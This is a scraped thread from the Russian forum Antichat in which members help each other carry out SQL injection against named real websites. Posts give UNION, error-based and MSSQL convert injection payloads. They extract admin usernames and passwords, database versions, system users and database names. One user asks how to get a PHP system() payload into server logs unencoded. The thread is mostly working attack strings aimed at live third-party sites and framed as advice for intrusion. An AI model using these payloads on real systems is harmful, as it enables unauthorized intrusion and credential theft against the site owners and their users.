Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.05.2010, 23:43
|
|
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049
Репутация:
1
|
|
делаю запрос:
http://test.ru/news.php?s=news_date%20DESC&v=0&newscat_id=-1+UNION%20SELECT%20concat(username,0x3a,password), 2,3+from+admins
ответ:
Error: Illegal mix of collations for operation 'UNION'
File: /var/www/test.ru/htdocs/news.php
Line: 69
Query: SELECT newscat_id, newscat_title, newscat_dependency FROM newscats WHERE newscat_id=-1 UNION SELECT concat(username,0x3a,password),2,3 from admins LIMIT 1
Как я понимаю, это из-за кодировки. Как подправить запрос? Кодировка utf8
|
|
|
03.05.2010, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Unhex(hex(version()))
|
|
|
|
03.05.2010, 09:31
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.omega-pharma.be/EN/onafh_content.php?id=5
vot pomoqite nayti version() ili user() ?
|
|
|
|
03.05.2010, 10:00
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
http://www.omega-pharma.be/EN/onafh_content.php?id=5+and+substring(version(),1,1 )=4
или через ошибку попробуй
|
|
|
|
03.05.2010, 14:35
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от LokbatanLi
http://www.omega-pharma.be/EN/onafh_content.php?id=5
vot pomoqite nayti version() ili user() ?
http://www.omega-pharma.be/EN/onafh_content.php?id=(4)or(1,1)=(select(count(0)), concat(( version()),floor(rand(0)*2))from(login)GROUP BY 2)
Duplicate entry ' 4.1.21-standard1' for key 1
Последний раз редактировалось v1d0qz; 03.05.2010 в 14:41..
|
|
|
|
03.05.2010, 18:19
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://www.retention.se/news.asp?id=1'&pg=1
вот никак не могу раскрутить инъекцию. Максимум что удалось:
1) узнать количество полей
2) и добыть информацию с последней талблицы в бд с помощью "having"
ни версии, ни имени бд, пользователя никак. В чем может быть проблема?
|
|
|
|
03.05.2010, 18:22
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
spasibo..
a kak table_name i t.d ?
|
|
|
|
03.05.2010, 18:24
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
тож не выводит. Выводит только то что и при запросе
http://www.retention.se/news.asp?id=1&pg=1
без всяких там ошибок и т.д.
|
|
|
|
03.05.2010, 18:36
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от pinch
http://www.retention.se/news.asp?id=1'&pg=1
вот никак не могу раскрутить инъекцию. Максимум что удалось:
1) узнать количество полей
2) и добыть информацию с последней талблицы в бд с помощью "having"
ни версии, ни имени бд, пользователя никак. В чем может быть проблема?
Код:
http://www.retention.se/news.asp?id=1+or+1=convert(int,@@version)&pg=1
System information:
-----------------------------------------
system_user: retenti_groupse
@@version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name(): retenti_se
select фильтруется, думай
|
|
|
|
03.05.2010, 19:13
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Подскажите как передать гет запрос с <? system.... ?> , что бы в логах скобочки не заменились на %3c %3e
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
